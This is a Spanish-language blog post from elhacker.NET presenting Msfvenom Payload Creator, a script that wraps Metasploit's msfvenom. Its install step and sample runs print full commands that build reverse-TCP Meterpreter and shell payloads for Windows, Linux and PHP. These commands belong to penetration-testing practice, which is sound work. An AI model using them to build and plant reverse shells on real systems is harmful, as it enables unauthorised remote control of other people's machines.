Tienda Wifi

Tienda Wifi
CiudadWireless es la tienda Wifi recomendada por elhacker.NET

Entradas Mensuales

Síguenos en:

Canal Oficial Telegram de elhacker.NET Grupo Facebook elhacker.NET Twitter elhacker.NET Canal Youtube elhacker.NET Comunidad Steam: Grupo elhacker.NET Mastodon

Entradas populares

PostHeaderIcon Msfvenom Payload Creator (MPC) para Metasploit


Msfvenom Payload Creator (MPC) es una herramienta creada por Got Milk? para crear de forma rápida de generar diversos payloads "básicos" en Meterpreter vía el nuevo msfvenom (parte del marco de Metasploit).




Las herramientas msfpayload y msfencode de Metasploit han despaarecido dejando paso a su sucesor msfvenomEl 8 de junio de 2015, el msfpayload  y msfencode se retiran del repositorio de Metasploit. Recordemos que Metasploit es un “Framework” para realizar test de intrusión desarrollada por Rapid 7.

Msfvenom Payload Creator (MPC) es un contenedor para generar múltiples tipos de cargas útiles, basados en elección de los usuarios. La idea es ser lo más simple posible (sólo requieren una entrada) para producir su payload Automatizar totalmente el msfvenom y Metasploit es el objetivo final (así como ser capaz de automatizar MPC en sí).



El resto es para hacer la vida del usuario más fácil posible (por ejemplo, el menú IP selección, archivo de recursos msfconsole / comandos y un servidor web rápida, etc).

La única entrada necesaria del usuario debe ser la definición de la carga útil que quieren, ya sea la plataforma (por ejemplo, Windows), o la extensión del archivo que desea el payload (por ejemplo, exe).

Nota: Esto no intentará hacer un bypass de cualquier antivirus.








Instalación

  • Diseñado para eKali Linux 1.1.0a + & Metasploit v4.11


curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc
chmod +x /usr/bin/mpc
mpc

Ayuda

root@kali:~# mpc
 [*] Msfvenom Payload Creator (MPC v1.1)

 [i] ./mpc.sh <TYPE> (<DOMAIN/IP>) (<PORT>)
 [i] <TYPE>: (All reverse TCP payloads)
 [i]   + ASP (meterpreter)
 [i]   + ASPX (meterpreter)
 [i]   + Bash [.sh] (shell)
 [i]   + Java [.jsp] (shell)
 [i]   + Linux [.elf] (meterpreter)
 [i]   + OSX [.macho] (shell)
 [i]   + Perl [.pl] (shell)
 [i]   + PHP (meterpreter)
 [i]   + Powershell [.ps1] (meterpreter)
 [i]   + Python [.py] (meterpreter)
 [i]   + Tomcat [.war] (shell)
 [i]   + Windows [.exe] (meterpreter)
 [i] Missing <DOMAIN/IP> will default to IP menu
 [i] Missing <PORT> will default to 443
root@kali:~#

Example #1 (Windows Fully Automated With IP And Port)

root@kali:~# mpc windows 192.168.155.175 4444
 [*] Msfvenom Payload Creator (MPC v1.1)
 [i]   IP: 192.168.155.175
 [i] PORT: 4444
 [i] TYPE: windows (windows/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows
-a x86 -e generic/none LHOST=192.168.155.175 LPORT=4444 -o /root/windows-meterpreter.exe [i] windows meterpreter created: '/root/windows-meterpreter.exe' [i] MSF handler file: '/root/windows-meterpreter-exe.rc
'
(msfconsole -q -r /root/windows-meterpreter-exe.rc) [?] Quick web server? python -m SimpleHTTPServer 8080 [*] Done! root@kali:~#

Example #2 (Linux Fully Automated With Interface And Format)

root@kali:~# ./mpc.sh elf eth0
 [*] Msfvenom Payload Creator (MPC v1.1)
 [i]   IP: 127.0.0.1
 [i] PORT: 443
 [i] TYPE: linux (linux/x86/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf --platform
linux -a x86 -e generic/none
LHOST=127.0.0.1 LPORT=443 -o /root/linux-meterpreter.elf [i] linux meterpreter created: '/root/linux-meterpreter.elf' [i] MSF handler file: '
/root/linux-meterpreter-elf.rc'
(msfconsole -q -r /root/linux-meterpreter-elf.rc) [?] Quick web server? python -m SimpleHTTPServer 8080 [*] Done! root@kali:~#

Example #3 (PHP Using Interactive IP Menu)

root@kali:~# bash mpc.sh php
 [*] Msfvenom Payload Creator (MPC v1.1)

 [i] Use which interface/IP address?:
 [i]   1.) eth0 - 192.168.103.140
 [i]   2.) eth1 - 192.168.155.175
 [i]   3.) lo - 127.0.0.1
 [?] Select 1-3, interface or IP address: 1

 [i]   IP: 192.168.103.140
 [i] PORT: 443
 [i] TYPE: php (php/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom -p php/meterpreter/reverse_tcp -f raw --platform php
-e generic/none -a php LHOST=192.168.103.140 LPORT=443 -o /root/php-meterpreter.php [i] php meterpreter created: '/root/php-meterpreter.php' [i] MSF handler file: '
/root/php-meterpreter-php.rc'
(msfconsole -q -r /root/php-meterpreter-php.rc) [?] Quick web server? python -m SimpleHTTPServer 8080 [*] Done! root@kali:~#
 
Fuente:
https://github.com/g0tmi1k/mpc

0 comentarios :

Publicar un comentario

Los comentarios pueden ser revisados en cualquier momento por los moderadores.

Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.

Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.